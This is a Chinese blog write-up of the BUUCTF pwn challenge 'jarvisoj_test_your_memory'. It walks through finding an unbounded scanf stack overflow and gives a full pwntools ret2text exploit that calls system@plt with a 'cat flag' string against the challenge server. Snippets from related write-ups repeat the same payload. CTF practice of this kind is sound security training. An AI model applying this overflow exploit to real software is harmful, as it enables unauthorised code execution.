BUUCTF pwn——jarvisoj_test_your_memory

于 2023-05-18 10:27:46 发布
阅读量115 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: PWN CTF 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130740966
版权

checksec

在这里插入图片描述

运行

直接输入就行
在这里插入图片描述

ida

main函数生成随机字符串

在这里插入图片描述

mem_test函数存在溢出

scanf没有限制读取长度
在这里插入图片描述

存在名为win_func的函数,提供了system,缺少参数

在这里插入图片描述

存在cat flag字符串,可以作为参数

在这里插入图片描述

给输入分配的栈空间为0x13

在这里插入图片描述

利用思路

ret2text
布置栈帧↓(by 国资社畜在这里插入图片描述

代码

'''
@Author       : 白银
@Date         : 2023-05-18 08:14:17
@LastEditors  : 白银
@LastEditTime : 2023-05-18 09:57:00
@FilePath     : /pwn/memory.py
@Description  : https://buuoj.cn/challenges#jarvisoj_test_your_memory
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './memory'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 25723)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x17  # ida看,s2和r差多少
call_sys = 0x8048440 # ida找到system函数,进去之后通过; CODE XREF: _system↑j进system的plt,直接左边地址,不要jmp:.plt:08048440 FF 25 18 A0 04 08             jmp     ds:off_804A018
cat_flag_addr = 0x80487E0  # ida用shift+f12发现有cat flag
main_addr = 0x8048677

payload = flat(['a' * padding, call_sys, main_addr, cat_flag_addr])

io.sendline(payload)

io.interactive()

没有shell,直接getflag

在这里插入图片描述

Captain杰派罗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jarvisoj_test_your_memory
m0sway的博客
12-27 1237
jarvisoj_test_your_memory 使用checksec查看: 只开启了栈不可执行,应该还是一道栈溢出题目。 放进IDA中查看: 先是用printf()输出了一个不知道什么玩意的东西 然后调用men_test() 跟进查看men_test(): printf("0x%x \n", hint);:输出了hint的地址 __isoc99_scanf("%s", &s);:存在栈溢出,距离ebp0x13 题目思路: 题目存在栈溢出,可以进行溢出调用system 题目
jarvisoj——Test Your Memory
王嘟嘟的博客
07-31 731
题目 Wp 基本项检查,32位,开了NX,got表可写 这里看到alphanum_2626和mem_test 跟进mem_test,可以看到是scanf 这里可以看到偏移,直接上payload 这里一定要有返回地址,不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 218
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
[BUUCTF]PWN——jarvisoj_test_your_memory
mcmuyanga的博客
11-06 460
jarvisoj_test_your_memory 附件 步骤: 例行检查,32位程序,开启了nx保护 试运行一下程序,看看大概的情况 32
[JarvisOJ][pwn]Test Your Memory
九层台
07-06 814
经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的 走进程序找信息。开启的保护只有NX .rodata:080487E0 00000009 C cat flag 这里有命令字符串cat flag 0804A058 system 这里有system函数,然后找漏洞吧 int __cdecl mem_test(char *s2) {...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 214
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
buuctf pwn wp(第二波)花哨点的AAAA系列
月阴荒的博客
03-21 409
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
buuoj jarvisoj_test_your_memory
pondzhang的专栏
03-26 283
存在溢出漏洞: 进行了逻辑判断,相等则输出good job!!! 从堆栈上看,s2在return地址下面。 整合上面,便于脚本如下: from pwn import* p = process('./memory') system_addr = 0x08048440 catflag_addr = 0x080487E0 payload='A'*0x17 + p32(system_addr...
Jarvis oj Test your Memory writeup
ditto的博客
01-05 862
简单的ret2plt 检查下防护,只开了NX。 放ida里: 问题出在mem_test函数里: 点开hint,发现了有"cat flag"这个字符串: 而且还在rodata区里,那直接硬编码就可以了。 程序本身调用了system函数,那直接ret2plt就行了。 根据ida计算出溢出点: 溢出点0x13+4。 编写exp: from pwn import* a=remote("p...
JarvisOJ pwn Test Your Memory
苗_的博客
02-24 231
先找到几个关键函数: 单击main看一下函数结构: 点进mem_test看下: 找到溢出点:scanf 点进去hint发现了cat flag字符串..... (问题突然变得很简单....ret2libc) exp: from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...
18.9.20 Jarvis OJ PWN----Test Your Memory
qq_42192672的博客
09-20 305
先checksec一下 可以栈溢出 放到IDA里看一下,发现有system函数(在函数with_func中调用),喜出望外,同时搜索字符串时,可以发现打开flag的指令,如下 再看一下哪里可以溢出,在mem_test函数中,scanf就可以溢出 直接上脚本吧 #代码主体 system_addr=bin.symbols['win_func'] payload='a'*(0x...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值